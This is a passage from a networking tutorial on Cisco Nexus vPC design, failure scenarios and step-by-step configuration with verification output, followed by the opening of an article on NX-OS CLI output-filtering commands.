Deploying MEC or vPC could require minimal changes to an existing switching infrastructure. Catalyst Switches may need a supervisor engine upgrade to form a VSS. Then, the primary loop avoidance mechanism is provided by MEC or vPC control protocols. STP is still in operation but is running only as a failsafe mechanism. Finally, the devices e.g. access switches, servers, etc., should be connected with multiple links to Data Center Distribution or Core switches. Link Aggregation Control Protocol (LACP) is the protocol that allows for dynamic portchannel negotiation and allows up to 16 physical interfaces to become members of a single port channel.

vPC Peer Keepalive Link Design Guidelines

Taking into account the importance and impact of the Peer Keepalive Link and the vPC Peer-Link, Cisco recommends the following types of interconnection for the vPC keepalive link, listed in order of preference:

Nexus 7000 & 9000 Series Switches                     Nexus 5000 & 3000 Series Switches
--------------------------------------------------    ---------------------------------------------------
1. Dedicated link(s) (1GE LC)                         1. mgmt0 interface (along with management traffic)
2. mgmt0 interface (along with management traffic)    2. Dedicated link(s) (1/10GE front panel ports)
3. As a last resort, routed in-band over the L3 infrastructure

Table 2. vPC Keepalive Link Interconnection methods

Special attention is needed where the mgmt interfaces of the Nexus switches are used to route the vPC keepalive packets via an Out-of-Band (OOB) management switch. Powering off the OOB management switch, or accidentally removing the keepalive links from it, in parallel with a vPC Peer-Link failure could lead to a split-brain scenario and a network outage.

Using a dedicated interface for the vPC keepalive link has the advantage that no other network device can affect it. Using point-to-point links makes it easier to control the path and minimizes the risk of failure. However, an interface on each vPC peer switch must be set aside to host the keepalive link, which can be a problem where there is a limited number of available interfaces or SFPs.

Layer 3 connectivity for the keepalive link can be accomplished either with an SVI or with a Layer 3 (no switchport) configuration on the interfaces involved. The SVI approach is the only option where the Nexus vPC peer switches do not support Layer 3 features. In either case, it is recommended to place the keepalive link in a separate VRF in order to isolate it from the default VRF. If an SVI is configured to route the keepalive packets, its VLAN must not be carried over the vPC Peer-Link; this is why the keepalive VLAN should be removed from the trunk allowed list of the vPC Peer-Link and the vPC member ports. Allowing the keepalive VLAN over the vPC peer trunk could lead to a split-brain scenario (analyzed below) and a network outage if the vPC Peer-Link fails!
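As a sketch of that last point, using the keepalive VLAN 23 and Peer-Link Port-channel 23 configured later in this article, the keepalive VLAN can be explicitly pruned from the Peer-Link trunk:

N5k-Primary(config)# interface port-channel 23
N5k-Primary(config-if)# switchport trunk allowed vlan remove 23

In the configuration example later in this article this is achieved implicitly, since only VLAN 10 is allowed on the vPC Peer-Link.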

vPC Peer-Link Design Guidelines

The following design guidelines are recommended for the vPC Peer-Links:

  • Member ports must be at least 10GE interfaces.
  • Use only point-to-point links, with no other devices between the vPC peers (Nexus switches), e.g. transceivers, microwave bridge links, etc.
  • Use at least two 10Gbps links, spread across two separate I/O modules on each switch, for best resiliency.
  • On oversubscribed modules, the ports should be configured in dedicated mode.
  • vPC Peer-Link ports should be located on a different I/O module than the one used by the Peer Keepalive Link.

The next section describes how the vPC Nexus switches interact with events triggered by failure of links (vPC Peer Keepalive Link, Peer-Link etc) or vPC Peer switch.

vPC Failure Scenario: vPC Peer-Link Failure

In the scenario where the vPC Peer-Link between the two Nexus switches fails, the status of the vPC peer is checked using the Peer Keepalive Link:


vPC Peer-Link Failure Scenario

If both vPC peers are still alive, the secondary vPC peer (i.e. the switch with the higher role priority value) disables all of its vPC member ports to avoid unpredictable traffic behavior and network loops, which could result in service disruption.

At this point traffic continues flowing through the Primary vPC without any disruptions.

In the unfortunate event there is an orphan device connected to the secondary peer, then its traffic will be black-holed.
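One way to soften this behaviour, on platforms that support it, is the vpc orphan-port suspend interface command, which suspends the orphan port on the secondary peer together with its vPC member ports so that a dual-homed active/standby device fails over to the primary. A minimal sketch, assuming the orphan device hangs off a hypothetical port Ethernet1/20:

N5k-Secondary(config)# interface ethernet 1/20
N5k-Secondary(config-if)# vpc orphan-port suspend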

vPC Failure Scenario: vPC Peer Keepalive Link Failure

In the event the Peer Keepalive Link fails, there is no negative effect on the operation of the vPC, which continues forwarding traffic. The Keepalive Link is used as a secondary test mechanism to confirm the vPC peer is alive in case the Peer-Link goes down:


vPC Peer Keepalive Link Failure Scenario

During a Keepalive Link failure there is no change of roles between the vPC peers (primary/secondary) and no downtime in the network.

As soon as the Keepalive Link is restored, the vPC continues to operate normally.

vPC Failure Scenario: vPC Peer Switch Failure

In the case of a total vPC peer switch failure, the remote switch learns of the failure via the Peer Keepalive Link, since no keepalive messages are received. Data traffic is forwarded over the remaining links until the failed switch recovers. It should be noted that the keepalive messages are used only when all the links in the Peer-Link fail:


vPC Peer Switch Failure Scenario

Spanning Tree Protocol is used as a loop prevention mechanism in the case of a simultaneous failure of the Peer Keepalive Link and the vPC Peer-Link.

vPC Failure Scenario: Dual Active or Split Brain

The Dual-Active or Split-Brain vPC failure scenario occurs when the Peer Keepalive Link fails, followed by the Peer-Link. Under this condition both switches assume the vPC primary role.

If this happens, the vPC primary switch remains primary and the vPC secondary switch becomes operational primary, causing severe network instability and an outage:


vPC Dual-Active or Split Brain Failure Scenario

Nexus vPC Configuration & Troubleshooting Guide

The vPC is configured and normal operation is verified by following the nine steps defined below. It should be noted that the order of the vPC configuration is important and that a basic vPC setup is established by using the first 4 steps:


vPC Configuration Steps

Step 1: Enable the vPC feature and configure the vPC domain ID on both Nexus switches.

Step 2: Select a Peer Keepalive deployment option.

Step 3: Establish the vPC peer keepalive link.

Step 4: Configure the vPC Peer-Link.

Step 4 completes the global vPC configuration on both vPC peer switches.

Step 5: Configure individual vPCs to downstream switches or devices.

Step 6: Optionally, enable the peer gateway feature to modify the First Hop Redundancy Protocol (FHRP) operation.

Step 7: Optionally, enable the peer switch feature to optimize the STP behaviour with vPCs.

Step 8: Optionally, enable the additional features to optimize the vPCs setup.

Step 9: Optionally, verify operation of the vPC and vPC consistency parameters.

Cisco Nexus vPC Configuration Example

To help illustrate the setup of the vPC technology we used two Nexus 5548 data center switches.  Typically, a similar process would be followed for any other type of Nexus switches.

Our two Nexus 5548 were given hostnames N5k-Primary & N5k-Secondary and the order outlined above was followed for the vPC setup and configuration:

Step 1: Enable the vPC Feature and Configure the vPC Domain ID on Both Switches

Following are the commands used to enable vPC and configure the vPC domain ID on the first switch:

N5k-Primary(config)# feature vpc

N5k-Primary(config)# vpc domain 1

N5k-Primary(config-vpc-domain)# show vpc role

vPC Role status

----------------------------------------------------

vPC role                        : none established             

Dual Active Detection Status    : 0

vPC system-mac                  : 00:23:04:ee:be:01             

vPC system-priority             : 32667

vPC local system-mac            : 8c:60:4f:2c:b3:01            

vPC local role-priority         : 0  

Now we configure the Nexus Secondary switch using the same commands:

N5k-Secondary(config)# feature vpc

N5k-Secondary(config)# vpc domain 1

N5k-Secondary(config-vpc-domain)# show vpc role

vPC Role status

----------------------------------------------------

vPC role                        : none established             

Dual Active Detection Status    : 0

vPC system-mac                  : 00:23:04:ee:be:01            

vPC system-priority             : 32667

vPC local system-mac            : 8c:60:4f:aa:c2:3c            

vPC local role-priority         : 0  

The same domain ID (ID 1 in our example) must be used on both vPC peer switches in the vPC domain. The output of the show vpc role command shows that the system MAC address is derived from the vPC domain ID: its last octet (01) matches the domain ID.
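As a side note, the vPC system MAC is always built from the reserved Cisco prefix 00:23:04:ee:be, with the last octet carrying the domain ID in hexadecimal; a domain ID of 10, for example, would produce a system MAC of 00:23:04:ee:be:0a.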

Step 2: Choose a Peer Keepalive Deployment Option

Our setup below utilizes the SVI technology and the second option (dedicated 1G link) proposed for the N5k series switches keepalive link setup (table 2). This deployment option involves a dedicated VLAN with a configured SVI used for the keepalive link within an isolated VRF (named keepalive) for complete isolation from the rest of the network. Interface Ethernet 1/32 is used by both switches as a dedicated interface for the keepalive link.

On the first switch we create VLAN 23 with an SVI (assign an IP address to the VLAN interface) and make it a member of the VRF instance created for this purpose. We complete the configuration by assigning Ethernet 1/32 to VLAN 23:

N5k-Primary(config)# vlan 23

N5k-Primary(config-vlan)# name keepalive

N5k-Primary(config)# vrf context keepalive

interface Vlan23

  vrf member keepalive

  ip address 192.168.1.1/24

interface Ethernet1/32

  switchport access vlan 23

  speed 1000

  duplex full

We follow the same configuration steps on our Secondary Nexus switch:

N5k-Secondary (config)# vlan 23

N5k-Secondary(config-vlan)# name keepalive

N5k-Secondary(config)# vrf context keepalive

 

interface Vlan23

  vrf member keepalive

  ip address 192.168.1.2/24

 

interface Ethernet1/32

  switchport access vlan 23

  speed 1000

  duplex full

The ping connectivity test between the Peer Keepalive Links is successful:

N5k-Secondary# ping 192.168.1.1 vrf keepalive

PING 192.168.1.1 (192.168.1.1): 56 data bytes

36 bytes from 192.168.1.2: Destination Host Unreachable

Request 0 timed out

64 bytes from 192.168.1.1: icmp_seq=1 ttl=254 time=3.91 ms

64 bytes from 192.168.1.1: icmp_seq=2 ttl=254 time=3.05 ms

64 bytes from 192.168.1.1: icmp_seq=3 ttl=254 time=1.523 ms

64 bytes from 192.168.1.1: icmp_seq=4 ttl=254 time=1.501 ms

Note: The initial ICMP timeout is normal behavior as the switch needs to initially send out an ARP request to obtain 192.168.1.1’s MAC address and then send the ICMP (ping) packet.

Step 3: Establish the vPC Peer Keepalive Link

By default, the vPC Peer Keepalive packets are routed in the management VRF and use the Out-Of-Band (OOB) mgmt interface.

It is, however, highly recommended to configure the vPC Peer Keepalive link to use a separate VRF instance to ensure that the peer keepalive traffic is always carried on that link and never on the Peer-Link. In addition,  the keepalive vlan should be removed from the trunk allowed list of the vPC Peer-Link or the vPC Member Ports.

N5k-Primary(config)# vpc domain 1

N5k-Primary (config-vpc-domain)# peer-keepalive destination 192.168.1.2 source 192.168.1.1 vrf keepalive

Configuration of the Secondary vPC follows:

N5k-Secondary(config)# vpc domain 1

N5k-Secondary(config-vpc-domain)# peer-keepalive destination 192.168.1.1 source 192.168.1.2 vrf keepalive

We can verify the status of the vPC Peer Keepalive Link using the show vpc peer-keepalive command on both switches:

N5k-Primary# show vpc peer-keepalive

vPC keep-alive status           : peer is alive                

--Peer is alive for             : (95) seconds, (201) msec

--Send status                   : Success

--Last send at                  : 2017.06.22 23:03:50 720 ms

--Sent on interface             : Vlan23

--Receive status                : Success

--Last receive at               : 2017.06.22 23:03:50 828 ms

--Received on interface         : Vlan23

--Last update from peer         : (0) seconds, (201) msec

vPC Keep-alive parameters

--Destination                   : 192.168.1.2

--Keepalive interval            : 1000 msec

--Keepalive timeout             : 5 seconds

--Keepalive hold timeout        : 3 seconds

--Keepalive vrf                 : keepalive

--Keepalive udp port            : 3200

--Keepalive tos                 : 192

Verifying the status of the vPC Peer Keepalive Link on our Secondary switch:

N5k-Secondary# show vpc peer-keepalive

vPC keep-alive status           : peer is alive                

--Peer is alive for             : (106) seconds, (385) msec

--Send status                   : Success

--Last send at                  : 2017.06.22 22:46:32 106 ms

--Sent on interface             : Vlan23

--Receive status                : Success

--Last receive at               : 2017.06.22 22:46:32 5 ms

--Received on interface         : Vlan23

--Last update from peer         : (0) seconds, (333) msec

vPC Keep-alive parameters

--Destination                   : 192.168.1.1

--Keepalive interval            : 1000 msec

--Keepalive timeout             : 5 seconds

--Keepalive hold timeout        : 3 seconds

--Keepalive vrf                 : keepalive

--Keepalive udp port            : 3200

--Keepalive tos                 : 192

Step 4: Configure the vPC Peer-Link

This step completes the global vPC configuration on both vPC peer switches and involves the creation of the Port-Channel to be used as the vPC Peer-Link.

First we need to enable the lacp feature then create our high-capacity port channel between the two switches to carry all necessary traffic.

The interfaces Eth1/2 and Eth1/3 are selected to become members of the vPC Peer-Link in LACP mode. In addition, the vPC is configured as a trunk. The allowed VLAN list for the trunk should be configured in such a way that only vPC VLANs (VLANs that are present on any vPCs) are allowed on the trunk. VLAN 10 has been created and allowed on the vPC Peer-Link:

N5k-Primary (config)# feature lacp

N5k-Primary(config)# interface ethernet 1/2-3

N5k-Primary(config-if-range)# description *** VPC PEER LINKS ***

N5k-Primary(config-if-range)# channel-group 23 mode active

N5k-Primary(config)# vlan 10

N5k-Primary(config)# interface port-channel 23

N5k-Primary(config-if)# description *** VPC PEER LINKS ***

N5k-Primary(config-if)# switchport mode trunk

N5k-Primary(config-if)# switchport trunk allowed vlan 10

N5k-Primary(config-if)# vpc peer-link

Please note that spanning tree port type is changed to "network" port type on vPC peer-link. This will enable spanning tree Bridge Assurance on vPC peer-link provided the STP Bridge Assurance(which is enabled by default) is not disabled.

N5k-Primary(config-if)# spanning-tree port type network 

An identical configuration follows for our Secondary switch:

N5k-Secondary(config)# feature lacp

N5k-Secondary(config)# interface ethernet 1/2-3

N5k-Secondary(config-if-range)# description *** VPC PEER LINKS ***

N5k-Secondary(config-if-range)# channel-group 23 mode active

N5k-Secondary(config)# vlan 10

N5k-Secondary(config)# interface port-channel 23

N5k-Secondary(config-if)# description *** VPC PEER LINKS ***

N5k-Secondary(config-if)# switchport mode trunk

N5k-Secondary(config-if)# switchport trunk allowed vlan 10

N5k-Secondary(config-if)# vpc peer-link

Please note that spanning tree port type is changed to "network" port type on vPC peer-link. This will enable spanning tree Bridge Assurance on vPC peer-link provided the STP Bridge Assurance (which is enabled by default) is not disabled

N5k-Secondary(config-if)# spanning-tree port type network

It is not recommended to carry non-vPC VLANs on the vPC Peer-Link, because this configuration could cause severe traffic disruption for the non-vPC VLANs if the vPC Peer-Link fails. Finally, the vPC Peer Keepalive messages should not be routed over the vPC Peer-Link, which is why the VLAN associated with the Peer Keepalive connection (VLAN 23) is not allowed on the vPC Peer-Link.

We can perform a final check on our vPC using the show vpc command:

N5k-Primary# show vpc

Legend:

                (*) - local vPC is down, forwarding via vPC peer-link

vPC domain id                     : 1  

Peer status                       : peer adjacency formed ok     

vPC keep-alive status             : peer is alive                

Configuration consistency status  : success

Per-vlan consistency status       : success                      

Type-2 consistency status         : success

vPC role                          : primary

Number of vPCs configured         : 0  

Peer Gateway                      : Disabled

Dual-active excluded VLANs        : -

Graceful Consistency Check        : Enabled

Auto-recovery status              : Enabled (timeout = 240 seconds)

vPC Peer-link status

---------------------------------------------------------------------

id   Port   Status Active vlans   

--   ----   ------ --------------------------------------------------

1    Po23   up     10

Verifying the vPC on the Secondary peer:

N5k-Secondary# show vpc

Legend:

                (*) - local vPC is down, forwarding via vPC peer-link

vPC domain id                     : 1  

Peer status                       : peer adjacency formed ok     

vPC keep-alive status             : peer is alive                

Configuration consistency status  : success

Per-vlan consistency status       : success                      

Type-2 consistency status         : success

vPC role                          : secondary, operational primary

Number of vPCs configured         : 0  

Peer Gateway                      : Disabled

Dual-active excluded VLANs        : -

Graceful Consistency Check        : Enabled

Auto-recovery status              : Enabled (timeout = 240 seconds)

vPC Peer-link status

---------------------------------------------------------------------

id   Port   Status Active vlans   

--   ----   ------ --------------------------------------------------

1    Po23   up     10

The show vpc output shows that the vPC Peer-Link has been successfully established between the Nexus 5548 switches.

Step 5: Configure Individual vPCs to Downstream Devices

Individual vPCs can now be configured since the vPC domain has been properly established in the previous step.

Individual vPCs are used to connect network devices to both data center switches. For example, a router or server can connect with two or more network interfaces to both switches simultaneously for increased redundancy and bandwidth availability.

For each individual vPC, a port channel is configured on both vPC peer switches. The two port channels are then associated with each other by assigning a vPC number to the port channel interfaces:

interface Ethernet1/1

  description *** Connected to ISR Gig0/2/4 ***

  switchport access vlan 10

  speed 1000

  channel-group 10

interface port-channel10

  switchport access vlan 10

  vpc 10

In our setup, vpc index 10 has been assigned to port-channel 10. It is generally good practice to keep the port-channel (e.g. port-channel 10) and vpc index  (e.g. vpc 10) the same to make tracking easier and avoid configuration mistakes.

Finally, the vPC number (e.g. vpc 10) assigned to the port channel facing the downstream device (e.g. a router) is unique for each individual vPC within the vPC domain and must be identical on the two peer switches, as shown in the diagram below:


Nexus vPC port-channel configuration to downstream devices

Finally, the vPC member ports should have a compatible and consistent configuration on both switches. Here is the configuration on the Primary Nexus switch:

interface Ethernet1/1

  description *** Connected to ISR Gig0/2/0 ***

  switchport access vlan 10

  speed 1000

  channel-group 10

interface port-channel10

  switchport access vlan 10

  vpc 10

Verifying our vPC to the downstream device from the Primary vPC peer:

N5k-Primary# show vpc | begin "vPC status"

vPC status

----------------------------------------------------------------------------

id     Port        Status  Consistency  Reason                    Active vlans

------ ----------- ------ ----------- -------------------------- -----------

10     Po10        up     success     success                    10          

Verifying our vPC to the downstream device from the Secondary vPC peer:

N5k-Secondary# show vpc | begin "vPC status"

vPC status

----------------------------------------------------------------------------

id     Port        Status Consistency Reason                     Active vlans

------ ----------- ------ ----------- -------------------------- -----------

10     Po10        up     success     success                    10         

Step 6: (Optional) Enable the Peer-Gateway Feature to Modify the FHRP Operation

The vPC Peer-Gateway feature allows a vPC peer to act as a gateway for packets that are destined for the MAC address of its peer device. This enables local forwarding of such packets without the need to cross the vPC Peer-Link, optimizes the use of the Peer-Link and avoids potential traffic loss in FHRP scenarios.

When enabled, the peer gateway feature must be configured on both primary and secondary vPC peers:

N5k-Primary(config)# vpc domain 1

N5k-Primary(config-vpc-domain)# peer-gateway

Configuring the secondary vPC peer:

N5k-Secondary(config)# vpc domain 1

N5k-Secondary(config-vpc-domain)# peer-gateway

Step 7: (Optional) Enable the Peer-Switch Feature to Optimize the STP Behaviour with the vPCs

This feature allows a pair of Cisco Nexus switches to appear as a single spanning tree root in the Layer 2 topology. It eliminates the need to pin the spanning tree root to the vPC primary switch and improves vPC convergence if the vPC primary switch fails:

N5k-Primary(config)# vpc domain 1

N5k-Primary(config-vpc-domain)# peer-switch

Configuring the peer-switch command on the Secondary vPC:

N5k-Secondary(config)# vpc domain 1

N5k-Secondary(config-vpc-domain)# peer-switch

Step 8: (Optional) Optimize vPC performance: ‘ip arp synchronize’, ‘delay restore’, ‘auto-recovery’, ‘graceful consistency-check’ & ‘role priority’ commands

Configure the following vPC commands in vPC domain configuration mode; they increase resiliency, optimize performance and reduce disruptions in vPC operations.

The ip arp synchronize feature synchronizes the ARP table between the peers when the Peer-Link comes up. The delay restore command delays the restoration of the vPC ports for a configurable time, which is useful to avoid traffic black-holing after a reboot of the switch. The auto-recovery command allows a switch to bring its vPCs up if its peer does not come back after a reload; its default timer is 240 seconds.

In addition, it is recommended to use the configuration synchronization graceful consistency-check feature to minimize disruption when a Type 1 mismatch occurs. Examples of Type 1 mismatches could be the STP mode or the STP port type between the vPC peer switches. The show vpc consistency-parameters global output illustrates the Type 1 and Type 2 parameters of a vPC.

The commands below enable and configure all the above mentioned features:

N5k-Primary(config)# vpc domain 1

N5k-Primary(config-vpc-domain)# delay restore 360

N5k-Primary(config-vpc-domain)# auto-recovery

Warning:

Enables restoring of vPCs in a peer-detached state after reload, will wait for 240 seconds to determine if peer is un-reachable

N5k-Primary(config-vpc-domain)# graceful consistency-check

N5k-Primary(config-vpc-domain)# ip arp synchronize

Once the Primary switch is configured we apply the same configuration to the Secondary switch:

N5k-Secondary(config)# vpc domain 1

N5k-Secondary(config-vpc-domain)# delay restore 360

N5k-Secondary(config-vpc-domain)# auto-recovery

Warning:

Enables restoring of vPCs in a peer-detached state after reload, will wait for 240 seconds to determine if peer is un-reachable

N5k-Secondary(config-vpc-domain)# graceful consistency-check

N5k-Secondary(config-vpc-domain)# ip arp synchronize

Finally, it should be noted that the role priority can be set under the vpc domain configuration with the role priority command in order to influence the election of the primary vPC switch.

The default role priority value is 32667, and the switch with the lowest priority value is elected as the vPC primary switch.

If the vPC primary switch is alive and the vPC Peer-Link goes down, the vPC secondary switch suspends its vPC member ports to prevent a dual-active scenario, while the vPC primary switch keeps all of its vPC member ports active. For this reason it is recommended that orphan devices (devices connecting to only one switch) be connected to the vPC primary switch.
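As a sketch, the election can be influenced by giving the intended primary switch the lower value (the numbers below are illustrative):

N5k-Primary(config)# vpc domain 1
N5k-Primary(config-vpc-domain)# role priority 100

N5k-Secondary(config)# vpc domain 1
N5k-Secondary(config-vpc-domain)# role priority 200

Note that the vPC role is non-preemptive: a priority change only takes effect at the next role election, for example after a Peer-Link flap or a reload.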

Verifying Operation and Troubleshooting the Status of the vPC

The show vpc brief command displays the vPC domain ID, the Peer-Link status, the Keepalive message status, whether the configuration consistency is successful, and whether a peer link has formed. It also states the status of the vPC Port Channel (Po10 in our setup).

N5k-Primary# show vpc brief

Legend:

               (*) - local vPC is down, forwarding via vPC peer-link

vPC domain id                     : 1  

Peer status                       : peer adjacency formed ok    

vPC keep-alive status             : peer is alive                

Configuration consistency status : success

Per-vlan consistency status       : success                      

Type-2 consistency status         : success

vPC role                         : primary, operational secondary

Number of vPCs configured         : 1

Peer Gateway                     : Enabled

Peer gateway excluded VLANs     : -

Dual-active excluded VLANs       : -

Graceful Consistency Check       : Enabled

Auto-recovery status             : Enabled (timeout = 240 seconds)

vPC Peer-link status

---------------------------------------------------------------------

id   Port   Status Active vlans  

--   ----   ------ --------------------------------------------------

1   Po23   up     10                                                      

vPC status

----------------------------------------------------------------------------

id     Port       Status Consistency Reason                     Active vlans

------ ----------- ------ ----------- -------------------------- -----------

10     Po10        up     success     success                   10        

The show vpc consistency-parameters command is useful for troubleshooting and identifying specific parameters that might have caused the consistency check to fail either on the vPC Peer-Link or to the vPC enabled Portchannels:

N5k-Primary# show vpc consistency-parameters global

   Legend:

       Type 1 : vPC will be suspended in case of mismatch

Name                       Type Local Value           Peer Value            

-------------               ---- ---------------------- -----------------------

QoS                         2     ([ ], [ ], [ ], [ ], [ ],   ([ ], [ ], [ ], [ ], [ ],

                                 [ ])                   [ ])                  

Network QoS (MTU)         2     (1538, 0, 0, 0, 0, 0) (1538, 0, 0, 0, 0, 0)

Network Qos (Pause)         2     (F, F, F, F, F, F)     (F, F, F, F, F, F)  

Input Queuing (Bandwidth)   2     (100, 0, 0, 0, 0, 0)   (100, 0, 0, 0, 0, 0)

Input Queuing (Absolute     2     (F, F, F, F, F, F)     (F, F, F, F, F, F)  

Priority)                                                                    

Output Queuing (Bandwidth) 2     (100, 0, 0, 0, 0, 0)   (100, 0, 0, 0, 0, 0)

Output Queuing (Absolute   2     (F, F, F, F, F, F)     (F, F, F, F, F, F)  

Priority)                                                                    

STP Mode                   1     Rapid-PVST             Rapid-PVST          

STP Disabled               1     None                   None                

STP MST Region Name         1     ""                     ""                  

STP MST Region Revision     1     0                     0                    

STP MST Region Instance to 1                                                

VLAN Mapping                                                                

STP Loopguard               1     Disabled               Disabled            

STP Bridge Assurance       1     Enabled               Enabled              

STP Port Type, Edge       1     Normal, Disabled,     Normal, Disabled,    

BPDUFilter, Edge BPDUGuard       Disabled               Disabled            

STP MST Simulate PVST       1     Enabled               Enabled              

IGMP Snooping Group-Limit   2     4000                  4000                

Interface-vlan admin up     2     10                     10                  

Interface-vlan routing     2     10                     10                  

capability                                                                    

Allowed VLANs               -     10                     10                  

Local suspended VLANs       -     -                     -                    

 

N5k-Primary# show vpc consistency-parameters vpc 10

   Legend:

       Type 1 : vPC will be suspended in case of mismatch

Name                       Type Local Value           Peer Value            

-------------               ---- ---------------------- -----------------------

Shut Lan                   1     No                    No                  

STP Port Type               1     Default               Default              

STP Port Guard             1     None                   None                

STP MST Simulate PVST       1     Default               Default              

mode                       1     on                     on                  

Speed                       1     1000 Mb/s             1000 Mb/s            

Duplex                     1     full                   full                

Port Mode                   1     access                 access              

MTU                         1     1500                   1500                

Admin port mode             1     access                 access              

vPC card type               1     Empty                 Empty                

Allowed VLANs               -     10                     10                  

Local suspended VLANs       -     -                     -   

vPC Quiz

Our Nexus 5500 switches used the management interface to establish the vPC keepalive link between them. The management interfaces on both switches are connected to a 2960 Catalyst management switch, which was accidentally switched off due to an unplanned power disruption, causing the management interfaces and the vPC keepalive link to go down. What is the impact of this failure on the Nexus vPC setup?

Answer:

There will be no service impact to the Nexus infrastructure! Read the vPC failure scenarios section in this article for a thorough explanation.

Summary

In this article we reviewed the Nexus vPC features and vPC design guidelines. In addition we discussed the vPC architecture components and explained the importance of each component.

Next we analyzed different vPC failure scenarios including vPC Peer-Link Failure and Peer Keepalive link failure. We compared vPC with VSS technology developed for the Catalyst Switches in order to provide MEC feature capabilities. Finally, the vPC configuration guide and best practices section showed how to configure vPC and apply optional configuration commands to increase resiliency and reduce disruptions in vPC operations. We also provided useful show commands needed to validate and troubleshoot the status of the vPC.

NEXUS NX-OS: Useful Commands, CLI Scripting, Hints & Tips, Python Scripting

NEXUS NX-OS: Useful Commands, CLI Scripting, Hints & Tips, Python Scripting and more

Whether you’re new to Cisco Nexus switches or have been working with them for years, this article will show how to get around the Nexus NX-OS using smart CLI commands and parameters, create your own commands and more. Learn how to filter show command outputs, efficiently use the include | begin | exclude search operators, turn pagination on/off, redirect output to files, run multiple commands in one CLI line, capture specific keywords from show command output, create custom CLI commands using alias, execute scripts, get an introduction to the Python environment in the Nexus NX-OS, execute Python scripts and much more!

By the end of this article we’ll agree there’s no doubt the Cisco NX-OS has several interesting commands and powerful scripting capabilities that can improve and facilitate the day-to-day administration of CISCO Nexus network devices.  

While basic knowledge of Cisco NX-OS, Linux and Python scripting is recommended, it is not mandatory in order to understand the topics covered.


NX-OS Command Output Filtering – Search Operators

The output from NX-OS show commands can be lengthy, which makes it difficult to find the information we are looking for. The Cisco NX-OS software provides the means to search and filter the output to assist in locating the information we are after.

Experienced Cisco users will surely be familiar with the IOS (Catalyst) include | begin | exclude search operators, which are also offered in the Nexus NX-OS (see below). The NX-OS offers additional search and filter options, which follow a pipe character (|) at the end of the show command, providing great flexibility when administering any Nexus device. The most useful, “Linux-like” options are displayed below (an example of the section operator follows the list):

N5k-UP# show interface brief | ?
<…>
  diff      Show difference between current and previous invocation (creates temp files: remove them with 'diff-clean' command and dont use it on commands with big outputs, like 'show tech'!)
  egrep     Egrep - print lines matching a pattern
  grep      Grep - print lines matching a pattern
  less      Filter for paging
  no-more   Turn-off pagination for command output
  section   Show lines that include the pattern as well as the subsequent lines that are more indented than matching line
  sort      Stream Sorter
  source    Run a script (python, tcl,...) from bootflash:scripts
  vsh       The shell that understands cli command
  wc        Count words, lines, characters
  xml       Output in xml format (according to .xsd definitions)
  begin     Begin with the line that matches
  count     Count number of lines
  exclude   Exclude lines that match
  include   Include lines that match
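
The section operator shown in the list above is worth a quick illustration: it prints the matching line together with the more-indented lines that follow it, which makes it handy for pulling a single configuration block out of the running configuration. A minimal, illustrative example (the interface and its configuration lines are hypothetical):

N5k-UP# show running-config | section Ethernet1/6
interface Ethernet1/6
  description *** TEST 1 ***
  no shutdown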

Filtering Output From The ‘Show’ Command - ‘Show <command> | grep’ & ‘Show <command> | egrep’ Parameters

The grep and egrep parameters can be used to filter the show command output for easier-to-read results.

The example below shows how to filter the show running-config output by specifying the number of lines to display before and after a matched line. The matching variable in our example is the keyword Firewall:

N5k-UP# show running-config | grep prev 1 next 2 Firewall
interface Ethernet1/1
description Firewall – LAN
interface Ethernet1/2
--
interface Ethernet1/4
description Firewall - WAN
interface Ethernet1/5

You can use the less operator to display the contents of a show command output one page at a time. Various command options are available at the ‘:’ prompt; to display all supported less command options, enter ‘h’ at the ‘:’ prompt.
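
For instance, a lengthy running configuration can be paged one screen at a time (a minimal example):

N5k-UP# show running-config | less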

An interesting and useful option is the show log | less command, which Unix/Linux users will welcome: pressing F at the ‘:’ prompt has the same effect as the Linux tail -f <filename> command. The switch will display the last entries of the system’s log and automatically update the display with any new log entries. Engineers and admins can troubleshoot problems while continually keeping an eye on the Nexus syslog, without having to re-run the show log command every minute to see new entries written to the system’s log:

N5k-UP# show log | less
:F
<…>
2023 May 15 11:59:20 N5k-UP %EEM_ACTION-2-CRIT: SLA-PYTHON-SCRIPT-FOR-8.8.8.8/32-EXECUTED
2023 May 15 11:59:20 N5k-UP %VSHD-5-VSHD_SYSLOG_CONFIG_I: Configured from vty by admin on vsh.1115
Waiting for data... (interrupt to abort)

To exit this mode simply type Ctrl-C and then q to abort.

Another useful operator is the sort parameter, which sorts the show command output as shown below with the Ethernet interfaces. Keep in mind that the output is sorted character by character (lexically), which means Eth1/1 is followed by Eth1/10, Eth1/11 and so on, before Eth1/2 appears.

N5k-UP# show interface brief | sort
Eth1/1 1 eth access down SFP validation failed 10G(D) --
Eth1/10 1 eth access down SFP not inserted 10G(D) --
Eth1/11 1 eth access down SFP not inserted 10G(D) --
Eth1/12 1 eth access down SFP not inserted 10G(D) --
<…>

Turning Off Pagination For Lengthy ‘Show’ Command Outputs. ‘Show <option> | no-more’ Parameter 

The | no-more parameter is particularly useful when there is a need to display all output without stopping at the end of each page. A good example is displaying the running configuration, or obtaining the output of any command in one hit. By default, the Nexus OS pauses the output once it reaches the end of the user’s terminal page. This behaviour can be easily bypassed by appending the | no-more parameter to the end of the command:

N5k-UP# show interface brief | no-more

Searching & Filtering Output From The ‘Show’ Command – The --More-- Prompt

You can search and filter output from the --More-- prompt displayed in the show command output. When the --More-- prompt appears (as shown below), simply type h to view all possible options. An interesting feature is to search the output by typing / (forward-slash) followed by the pattern you are looking for:

N5k-UP# show running-config
!Command: show running-config
!Time: Mon May 15 12:30:09 2023
<…>
--More--
<…>
/<regular expression>

Displaying Last Lines From The ‘Show’ Command Output – ‘Show <option> | last ’

When working with lengthy outputs from commands such as show logging it’s often desirable to display the last lines of the command output. The show <option> | last command will display the last 10 lines by default. Appending a number after the keyword last will adjust the lines displayed. The example below shows the last 5 log entries in our Nexus system:

N5k-UP# show logging | last 5
2023 May 15 12:34:30 N5k-UP %VSHD-5-VSHD_SYSLOG_CONFIG_I: Configured from vty by admin on vsh.5669
2023 May 15 12:34:40 N5k-UP %EEM_ACTION-2-CRIT: SLA-PYTHON-SCRIPT-FOR-8.8.8.8/32-EXECUTED
2023 May 15 12:34:40 N5k-UP %VSHD-5-VSHD_SYSLOG_CONFIG_I: Configured from vty by admin on vsh.5691
2023 May 15 12:34:50 N5k-UP %EEM_ACTION-2-CRIT: SLA-PYTHON-SCRIPT-FOR-8.8.8.8/32-EXECUTED
2023 May 15 12:34:50 N5k-UP %VSHD-5-VSHD_SYSLOG_CONFIG_I: Configured from vty by admin on vsh.5709

